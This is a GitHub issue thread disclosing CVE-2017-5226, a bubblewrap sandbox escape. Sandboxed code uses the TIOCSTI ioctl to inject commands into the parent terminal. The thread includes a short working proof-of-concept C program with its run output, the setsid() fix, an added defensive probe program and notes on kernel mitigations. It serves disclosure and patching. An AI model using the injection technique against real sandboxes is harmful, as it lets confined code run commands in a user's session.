CVE-2017-5226 -- bubblewrap escape via TIOCSTI ioctl #142

Closed
smcv opened this issue Jan 9, 2017 · 3 comments

@smcv (Contributor) commented Jan 9, 2017

On Debian bug https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702, Federico Bento <up201407890@alunos.dcc.fc.up.pt> writes:

When executing a program via the bubblewrap sandbox, the nonpriv
session can escape to the parent session by using the TIOCSTI ioctl to
push characters into the terminal's input buffer, allowing an attacker
to escape the sandbox.

This has been assigned CVE-2017-5226.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
#include <termios.h>

int main(void)
{
  /* Push "id\n" into the controlling terminal's input queue one byte at a
   * time; TIOCSTI takes a pointer to a single character. The tty does not
   * know or care that the caller is inside the sandbox. */
  const char *cmd = "id\n";
  while (*cmd)
    ioctl(0, TIOCSTI, cmd++);
  /* Then behave like an ordinary program so the run looks benign. */
  execlp("/bin/id", "id", NULL);
  return 1; /* only reached if execlp() fails */
}
$ gcc test.c -o /tmp/test
$ bwrap --ro-bind /lib64 /lib64 --ro-bind /home /home --ro-bind /bin /bin \
    --ro-bind /tmp /tmp --chdir / --unshare-pid --uid 0 /tmp/test
id
uid=0 gid=1000 groups=1000
$ id  <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)

I don't know who assigned the CVE ID or whether the bug reporter has made any attempt to report it upstream already.

smcv added a commit to smcv/bubblewrap that referenced this issue Jan 9, 2017

Call setsid() before executing sandboxed code (CVE-2017-5226)
This prevents the sandboxed code from getting a controlling tty,
which in turn prevents it from accessing the TIOCSTI ioctl and hence
faking terminal input.

Fixes: projectatomic#142
@smcv (Contributor, Author) commented Jan 9, 2017

Calling setsid() appears to be sufficient to avoid this, if we are willing to sacrifice tty job control for the sandboxed processes. With a slightly modified exploit that calls perror() if the ioctl fails:

ioctl TIOCSTI: Operation not permitted
ioctl TIOCSTI: Operation not permitted
ioctl TIOCSTI: Operation not permitted

I'm going to apply that in Debian for now.
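To make the mechanism behind the setsid() fix concrete, the following is an added example, not bubblewrap's own code and not part of the issue thread. The kernel only honours TIOCSTI on the caller's controlling terminal (or for a caller with CAP_SYS_ADMIN). A child that calls setsid() before exec leads a new session with no controlling terminal, so the same ioctl that injected "id\n" above is refused with EPERM (ENOTTY if fd 0 is not a tty at all). The names detach_and_probe, run_probe and struct tty_probe are mine; the program assumes Linux and probes whatever fd 0 it inherits, once in the parent's session and once after setsid().

```c
/*
 * Added example (not bubblewrap's code): why setsid() before exec defeats
 * the TIOCSTI injection.  detach_and_probe() forks a child, optionally
 * calls setsid() in it, records three observations and returns them to the
 * parent over a pipe.  With do_setsid=1 the child always leads its own
 * session, can never open /dev/tty and can never inject via TIOCSTI.
 */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <termios.h>
#include <unistd.h>

struct tty_probe {
    int sid_is_own;    /* 1 if getsid(0) == getpid(): child leads a new session */
    int devtty_errno;  /* errno from open("/dev/tty"); 0 means a controlling tty exists */
    int tiocsti_errno; /* errno from ioctl(0, TIOCSTI); 0 means a byte was injected */
};

static void run_probe(struct tty_probe *p)
{
    char c = '\n'; /* harmless byte; only lands in the tty if the check fails open */
    int fd;

    memset(p, 0, sizeof *p);
    p->sid_is_own = (getsid(0) == getpid());

    fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd < 0)
        p->devtty_errno = errno;   /* ENXIO when there is no controlling tty */
    else
        close(fd);

    if (ioctl(0, TIOCSTI, &c) < 0)
        p->tiocsti_errno = errno;  /* EPERM after setsid(); ENOTTY if fd 0 is not a tty */
}

/* Returns 0 on success and fills *out with the child's observations. */
int detach_and_probe(int do_setsid, struct tty_probe *out)
{
    int pfd[2];
    pid_t pid;
    ssize_t n;

    if (pipe(pfd) < 0)
        return -1;
    pid = fork();
    if (pid < 0) {
        close(pfd[0]);
        close(pfd[1]);
        return -1;
    }
    if (pid == 0) {
        struct tty_probe p;
        close(pfd[0]);
        if (do_setsid)
            setsid();              /* the fix: detach from the controlling tty before exec */
        run_probe(&p);
        if (write(pfd[1], &p, sizeof p) != (ssize_t)sizeof p)
            _exit(1);
        _exit(0);
    }
    close(pfd[1]);
    n = read(pfd[0], out, sizeof *out);
    close(pfd[0]);
    waitpid(pid, NULL, 0);
    return n == (ssize_t)sizeof *out ? 0 : -1;
}

static void report(const char *label, const struct tty_probe *p)
{
    printf("%-18s own session=%d  /dev/tty: %s  TIOCSTI: %s\n", label, p->sid_is_own,
           p->devtty_errno ? strerror(p->devtty_errno) : "opened",
           p->tiocsti_errno ? strerror(p->tiocsti_errno) : "INJECTED");
}

int main(void)
{
    struct tty_probe before, after;

    if (detach_and_probe(0, &before) == 0)
        report("without setsid():", &before);
    if (detach_and_probe(1, &after) == 0)
        report("with setsid():", &after);
    return 0;
}
```

Run it from an interactive shell to see the contrast: the first line reports /dev/tty opened and TIOCSTI succeeding (one empty line is injected into your shell), the second reports ENXIO and "Operation not permitted", matching the perror() output quoted above. The cost is the one the comment names: a session leader with no controlling tty gets no job control. Since Linux 6.2 the kernel also has CONFIG_LEGACY_TIOCSTI and the sysctl dev.tty.legacy_tiocsti; with it set to 0 the ioctl is refused with EIO for unprivileged callers regardless of session, which is the kernel-side fix the last comment alludes to.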

@smcv (Contributor, Author) commented Jan 9, 2017

This is arguably not a vulnerability in Bubblewrap itself, because it does not give the user calling Bubblewrap any more privileges outside the sandbox than they had inside.

However, I think it is correct to treat it as a vulnerability in Flatpak, and in any other sandboxes based on Bubblewrap that might be invoked with a controlling terminal.

@smcv (Contributor, Author) commented Jan 9, 2017

I should note here for completeness that at least one member of the Debian security team seems to think this and its clones (CVE-2005-4890, CVE-2016-7545, CVE-2016-2781, CVE-2016-2779, CVE-2016-2568) are really all examples of one kernel issue, namely "TIOCSTI should be a privileged operation". https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702#27
